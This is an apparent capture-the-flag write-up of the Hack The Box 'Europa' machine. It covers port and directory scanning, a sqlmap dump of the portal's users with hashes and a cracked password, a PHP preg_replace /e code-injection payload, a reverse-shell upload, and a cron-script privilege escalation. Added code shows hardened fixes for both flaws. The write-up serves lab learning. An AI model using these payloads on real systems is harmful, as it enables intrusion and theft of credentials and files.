Port scanning

┌──(mikannse㉿kali)-[~/HTB/europa]
└─$ sudo nmap --min-rate=10000 -p- 10.10.10.22
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-08 22:38 CST
Nmap scan report for 10.10.10.22
Host is up (0.080s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp open https

Nmap done: 1 IP address (1 host up) scanned in 13.51 seconds
┌──(mikannse㉿kali)-[~/HTB/europa]
└─$ sudo nmap -sT -sV -sC -O -p22,80,443 10.10.10.22
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-08 22:40 CST
Nmap scan report for 10.10.10.22
Host is up (0.067s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 6b:55:42:0a:f7:06:8c:67:c0:e2:5c:05:db:09:fb:78 (RSA)
| 256 b1:ea:5e:c4:1c:0a:96:9e:93:db:1d:ad:22:50:74:75 (ECDSA)
|_ 256 33:1f:16:8d:c0:24:78:5f:5b:f5:6d:7f:f7:b4:f2:e5 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=europacorp.htb/organizationName=EuropaCorp Ltd./stateOrProvinceName=Attica/countryName=GR
| Subject Alternative Name: DNS:www.europacorp.htb, DNS:admin-portal.europacorp.htb
| Not valid before: 2017-04-19T09:06:22
|_Not valid after: 2027-04-17T09:06:22
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
| tls-alpn:
|_ http/1.1
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|specialized|phone|storage-misc
Running (JUST GUESSING): Linux 3.X|4.X|5.X (90%), Crestron 2-Series (86%), Google Android 4.X (86%), HP embedded (85%)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/o:crestron:2_series cpe:/o:google:android:4.0 cpe:/o:linux:linux_kernel:5.0 cpe:/h:hp:p2000_g3
Aggressive OS guesses: Linux 3.10 - 4.11 (90%), Linux 3.12 (90%), Linux 3.13 (90%), Linux 3.13 or 4.2 (90%), Linux 3.16 (90%), Linux 3.16 - 4.6 (90%), Linux 3.18 (90%), Linux 3.2 - 4.9 (90%), Linux 3.8 - 3.11 (90%), Linux 4.2 (90%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.60 seconds

Add hosts entries:

10.10.10.22 europacorp.htb admin-portal.europacorp.htb www.europacorp.htb

Directory brute-forcing the admin portal turns up the backend login page

┌──(mikannse㉿kali)-[~/HTB/europa]
└─$ feroxbuster -u https://admin-portal.europacorp.htb/ -x rar,php,zip,sql,txt,html,bak --filter-status 404 -k

___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.4
───────────────────────────┬──────────────────────
🎯 Target Url │ https://admin-portal.europacorp.htb/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
💢 Status Code Filters │ [404]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.4
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
💲 Extensions │ [rar, php, zip, sql, txt, html, bak]
🏁 HTTP methods │ [GET]
🔓 Insecure │ true
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 9l 32w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403 GET 11l 32w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
302 GET 0l 0w 0c https://admin-portal.europacorp.htb/ => https://admin-portal.europacorp.htb/login.php
301 GET 9l 28w 341c https://admin-portal.europacorp.htb/js => https://admin-portal.europacorp.htb/js/
302 GET 0l 0w 0c https://admin-portal.europacorp.htb/logout.php => https://admin-portal.europacorp.htb/login.php
200 GET 434l 1004w 8420c https://admin-portal.europacorp.htb/dist/css/sb-admin-2.css
200 GET 9l 46w 1879c https://admin-portal.europacorp.htb/vendor/metisMenu/metisMenu.min.js
200 GET 10l 29w 781c https://admin-portal.europacorp.htb/vendor/metisMenu/metisMenu.min.css
200 GET 47l 163w 1626c https://admin-portal.europacorp.htb/dist/js/sb-admin-2.js
200 GET 4l 66w 29063c https://admin-portal.europacorp.htb/vendor/font-awesome/css/font-awesome.min.css
200 GET 7l 432w 37045c https://admin-portal.europacorp.htb/vendor/bootstrap/js/bootstrap.min.js
301 GET 9l 28w 343c https://admin-portal.europacorp.htb/logs => https://admin-portal.europacorp.htb/logs/
301 GET 9l 28w 343c https://admin-portal.europacorp.htb/data => https://admin-portal.europacorp.htb/data/
200 GET 4l 1292w 86351c https://admin-portal.europacorp.htb/vendor/jquery/jquery.min.js
200 GET 6l 1429w 121200c https://admin-portal.europacorp.htb/vendor/bootstrap/css/bootstrap.min.css
200 GET 122l 240w 3968c https://admin-portal.europacorp.htb/login.php
302 GET 0l 0w 0c https://admin-portal.europacorp.htb/tools.php => https://admin-portal.europacorp.htb/login.php
200 GET 0l 0w 0c https://admin-portal.europacorp.htb/db.php
302 GET 0l 0w 0c https://admin-portal.europacorp.htb/index.php => https://admin-portal.europacorp.htb/login.php

PHP PCRE Functions

Capture a login request on the login page and sqlmap handles the rest in one go

┌──(mikannse㉿kali)-[~/HTB/europa]
└─$ sqlmap -r 1 --risk 3 --level 5 --force-ssl --batch --dump
+----+----------------------+----------+----------------------------------+---------------+
| id | email | active | password | username |
+----+----------------------+----------+----------------------------------+---------------+
| 1 | admin@europacorp.htb | 1 | 2b6d315337f18617ba18922c0b9597ff | administrator |
| 2 | john@europacorp.htb | 1 | 2b6d315337f18617ba18922c0b9597ff | john |
+----+----------------------+----------+----------------------------------+---------------+

The admin user's hash cracks to: SuperSecretPassword!

After logging in, the page worth noting is the tools page: it takes an IP address and generates an OpenVPN config file. Capturing the request shows a pattern parameter, which suggests the server is applying a PHP regular expression to the template. Since we control that parameter we can change the pattern ourselves, which triggers a regex vulnerability: in short, appending the /e modifier makes PHP execute the replacement string as code

Details of the vulnerability: https://www.madirish.net/402

Sending a request like pattern=/(.*)/e&ipaddress=system('whoami');&text=test gives command execution, so a reverse shell is possible. Annoyingly, a reverse shell with nc hung outright and then the web service crashed completely, leaving no option but to reset the box, so I tried uploading /usr/share/webshells/php/php-reverse-shell.php to get the reverse shell instead

Upload it to /tmp and run it by pointing php -f at it
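An added example, not the box's own tools.php: the vulnerable shape of the config generator beside a hardened rewrite. Function names, the template and the sample inputs are assumptions; the request fields (pattern, ipaddress, text) are the ones seen above. The /e modifier was deprecated in PHP 5.5 and removed in 7.0, but the fix is the same either way: user input must never select the pattern.

```php
<?php
// Added example, not the box's own tools.php. Function and parameter names
// are assumptions; the request fields (pattern, ipaddress, text) are the ones
// seen in the writeup.

// Vulnerable shape: pattern, replacement and subject all come from the request.
// With the /e modifier (PHP < 7.0) preg_replace evaluates the replacement string
// as PHP code, so a pattern of /(.*)/e turns "ipaddress" into server-side code.
function generate_config_vulnerable(array $request): ?string
{
    return preg_replace($request['pattern'], $request['ipaddress'], $request['text']);
}

// Hardened shape: the template and its placeholder live server-side, the address
// is validated as a literal IP, and no user input ever reaches the regex engine.
const CONFIG_TEMPLATE = "client\nremote ip_address 1194\nproto udp\n";

function generate_config_hardened(string $ipaddress): string
{
    if (filter_var($ipaddress, FILTER_VALIDATE_IP) === false) {
        throw new InvalidArgumentException('invalid IP address');
    }
    // Plain string substitution: no modifiers, no metacharacters, no evaluation.
    return str_replace('ip_address', $ipaddress, CONFIG_TEMPLATE);
}

// If a regex is genuinely needed, keep the pattern fixed and use a callback;
// preg_replace_callback inserts whatever the callback returns, as text only.
function generate_config_callback(string $ipaddress): string
{
    if (filter_var($ipaddress, FILTER_VALIDATE_IP) === false) {
        throw new InvalidArgumentException('invalid IP address');
    }
    return preg_replace_callback(
        '/ip_address/',
        function (array $m) use ($ipaddress): string { return $ipaddress; },
        CONFIG_TEMPLATE
    );
}

// Constructed inputs: the injection string from the writeup is rejected,
// a real (made-up) address is substituted into the template.
foreach (["system('whoami');", '10.10.14.5'] as $input) {
    try {
        echo generate_config_hardened($input);
    } catch (InvalidArgumentException $e) {
        echo "rejected '{$input}': {$e->getMessage()}\n";
    }
}
```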

Privilege escalation

Got db.php, but everything in the database is already known

In /var/www/cronjobs there is a PHP script for clearing logs, and /etc/crontab runs it every minute

<?php
// Empty the admin portal's access log
$file = '/var/www/admin/logs/access.log';
file_put_contents($file, '');
// Then run a helper script from a directory that www-data can write to
exec('/var/www/cmd/logcleared.sh');
?>

And www-data has write permission on the /var/www/cmd/ directory, so simply writing a /var/www/cmd/logcleared.sh is enough to execute arbitrary commands
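An added example, not the box's cron script: the same job rewritten so that it refuses to exec a helper that a web-server user could have modified. The paths are the ones from the writeup; the checks, messages and the assumption that the job runs as root are mine. The primary fix is still to take away www-data's write access to /var/www/cmd (and ideally to run the job as an unprivileged user); this check is defence in depth.

```php
<?php
// Added example, not the box's /var/www/cronjobs script. Paths match the
// writeup; the trust checks and the root-cron assumption are mine.

const LOG_FILE = '/var/www/admin/logs/access.log';
const HELPER   = '/var/www/cmd/logcleared.sh';

// Return true only if $path is a regular file owned by root (uid 0), writable
// by nobody but root, and sitting in a directory with the same properties.
// A job running as root must never exec anything www-data can rewrite.
function helper_is_trusted(string $path): bool
{
    $st = @lstat($path);                                   // lstat: do not follow symlinks
    if ($st === false) {
        return false;                                      // missing or unreadable
    }
    if (($st['mode'] & 0170000) !== 0100000) {
        return false;                                      // S_IFREG: must be a regular file
    }
    if ($st['uid'] !== 0 || ($st['mode'] & 0022) !== 0) {
        return false;                                      // not root-owned or group/world writable
    }
    // A writable parent directory lets the file be swapped out, so check it too.
    $dst = @stat(dirname($path));
    if ($dst === false || $dst['uid'] !== 0 || ($dst['mode'] & 0022) !== 0) {
        return false;
    }
    return true;
}

file_put_contents(LOG_FILE, '');

if (!helper_is_trusted(HELPER)) {
    error_log('refusing to exec untrusted helper: ' . HELPER);
    exit(1);
}
exec(escapeshellarg(HELPER), $output, $rc);
exit($rc);
```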

www-data@europa:/tmp$ echo 'cp /root/root.txt /tmp/root.txt;chmod 777 /tmp/root.txt' > /var/www/cmd/logcleared.sh
www-data@europa:/tmp$ chmod +x /var/www/cmd/logcleared.sh

Ramblings

An unexpectedly easy box, although the PHP PCRE part was a first for me (or maybe I'd seen it before and forgot)